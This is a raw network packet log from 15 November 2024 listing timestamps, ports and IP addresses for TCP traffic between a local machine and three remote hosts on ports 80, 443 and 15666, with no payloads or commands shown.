Nov 15, 2024 10:36:01.531640053 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.531672955 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.531692982 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.531697035 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.531706095 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.531717062 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.531728983 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.531744003 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.531768084 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.531783104 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.531795025 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.531804085 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.531829119 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.533288956 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.533299923 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.533304930 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.533341885 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.533363104 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.533370972 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.533381939 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.533390999 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.533432007 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.545650005 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.568763018 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.568777084 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.568803072 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.568816900 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.568836927 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.568850040 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.568850040 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.568922997 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.568934917 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.568945885 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.568948030 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.568960905 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.568972111 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.568984032 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.569019079 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.569144964 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.569185972 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.569226027 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.569237947 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.569272041 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.569283962 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.569298983 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.569312096 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.569353104 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.569475889 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.569488049 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.569514990 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.569519043 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.569526911 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.569540024 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.569551945 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.569557905 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.569583893 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.591475964 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.591516972 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.591531038 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.591561079 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.591598988 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.591629028 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.591641903 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.591655016 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.591665983 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.591680050 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.591685057 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.591706038 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.592432022 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.592448950 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.592468977 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.592482090 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.592483044 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.592494965 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.592509031 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.592509031 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.592521906 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.592533112 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.592535973 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.592549086 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.592561007 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.592575073 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.592575073 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.592598915 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.592612982 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.592740059 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.592752934 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.592765093 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.592777014 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.592787027 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.592789888 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.592807055 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.627840042 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.627856970 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.627918005 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.627959967 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.627974033 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.627998114 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.628133059 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.628144026 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.628155947 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.628166914 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.628177881 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.628179073 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.628195047 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.628220081 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.628299952 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.628479004 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.628489971 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.628500938 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.628510952 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.628521919 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.628524065 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.628551006 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.628567934 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.628846884 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.628863096 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.628876925 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.628891945 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.628897905 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.628907919 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.628926992 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.628976107 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.629010916 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.629182100 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.629196882 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.629214048 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.629228115 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.629232883 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.629242897 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.629261971 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:01.629262924 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:01.629303932 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:25.664144039 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:25.669433117 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:25.669532061 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:25.777138948 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:25.782229900 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:25.782349110 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:26.367404938 CET	49924	443	192.168.2.6	172.67.74.152
Nov 15, 2024 10:36:26.367424965 CET	443	49924	172.67.74.152	192.168.2.6
Nov 15, 2024 10:36:26.367506981 CET	49924	443	192.168.2.6	172.67.74.152
Nov 15, 2024 10:36:26.374214888 CET	49924	443	192.168.2.6	172.67.74.152
Nov 15, 2024 10:36:26.374226093 CET	443	49924	172.67.74.152	192.168.2.6
Nov 15, 2024 10:36:27.020391941 CET	443	49924	172.67.74.152	192.168.2.6
Nov 15, 2024 10:36:27.020466089 CET	49924	443	192.168.2.6	172.67.74.152
Nov 15, 2024 10:36:27.098411083 CET	49924	443	192.168.2.6	172.67.74.152
Nov 15, 2024 10:36:27.098447084 CET	443	49924	172.67.74.152	192.168.2.6
Nov 15, 2024 10:36:27.098781109 CET	443	49924	172.67.74.152	192.168.2.6
Nov 15, 2024 10:36:27.098835945 CET	49924	443	192.168.2.6	172.67.74.152
Nov 15, 2024 10:36:27.100286961 CET	49924	443	192.168.2.6	172.67.74.152
Nov 15, 2024 10:36:27.147332907 CET	443	49924	172.67.74.152	192.168.2.6
Nov 15, 2024 10:36:27.276905060 CET	443	49924	172.67.74.152	192.168.2.6
Nov 15, 2024 10:36:27.276969910 CET	443	49924	172.67.74.152	192.168.2.6
Nov 15, 2024 10:36:27.276969910 CET	49924	443	192.168.2.6	172.67.74.152
Nov 15, 2024 10:36:27.277019024 CET	49924	443	192.168.2.6	172.67.74.152
Nov 15, 2024 10:36:27.277345896 CET	49924	443	192.168.2.6	172.67.74.152
Nov 15, 2024 10:36:27.277364969 CET	443	49924	172.67.74.152	192.168.2.6
Nov 15, 2024 10:36:32.156044006 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.161030054 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.161097050 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.161108971 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.161125898 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.161150932 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.161178112 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.161176920 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.161206007 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.161227942 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.161257029 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.161269903 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.161298037 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.161324978 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.161351919 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.161358118 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.161374092 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.161379099 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.161402941 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.161431074 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.166373014 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.166402102 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.166434050 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.166436911 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.166450024 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.166484118 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.166484118 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.166532993 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.166557074 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.166632891 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.166687965 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.166918039 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.167009115 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.167037010 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.167121887 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.171686888 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.171716928 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.171744108 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.171802044 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.171828032 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.172032118 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.172060966 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.172087908 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.172121048 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.172185898 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.172218084 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.172286034 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.172298908 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.172346115 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.172374964 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.172430992 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.172590971 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.172619104 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.172646999 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.172657967 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.172673941 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.172686100 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.172699928 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.172702074 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.172729015 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.172739029 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.172766924 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.172776937 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.172780991 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.172808886 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.172836065 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.172840118 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.172854900 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.172862053 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.172888994 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.172889948 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.172904015 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.172918081 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.172949076 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.172966957 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.172971010 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.172995090 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.173022032 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.173038006 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.173048973 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.173063040 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.173075914 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.173084021 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.173106909 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.173132896 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.176812887 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.176841974 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.176868916 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.176909924 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.176919937 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.176928043 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.176948071 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.176975965 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.176991940 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.177005053 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.177020073 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.177047014 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.177052975 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.177062988 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.177078962 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.177097082 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.177128077 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.177128077 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.177160025 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.177206993 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.177216053 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.177267075 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.177277088 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.177326918 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.177354097 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.177365065 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.177381992 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.177397966 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.177432060 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.177437067 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.177459955 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.177486897 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.177511930 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.177514076 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.177541971 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.177546978 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.177577019 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.177587986 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.177849054 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.177913904 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.177957058 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.177984953 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.178011894 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.178040028 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.178052902 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.178061008 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.178087950 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.178112984 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.178114891 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.178159952 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.178164005 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.178191900 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.178216934 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.178236961 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.178263903 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.178303957 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.178312063 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.178316116 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.178340912 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.178369045 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.178373098 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.178384066 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.178395987 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.178419113 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.178422928 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.178447962 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.178451061 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.178474903 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.178478003 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.178503990 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.178505898 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.178529024 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.178534031 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.178560972 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.178561926 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.178585052 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.178612947 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.178615093 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.178643942 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.178670883 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.178698063 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.178699017 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.178726912 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.178739071 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.178755045 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.178782940 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.178798914 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.178812027 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.178823948 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.178836107 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.178838968 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.178864956 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.178867102 CET	15666	49920	45.130.145.152	192.168.2.6
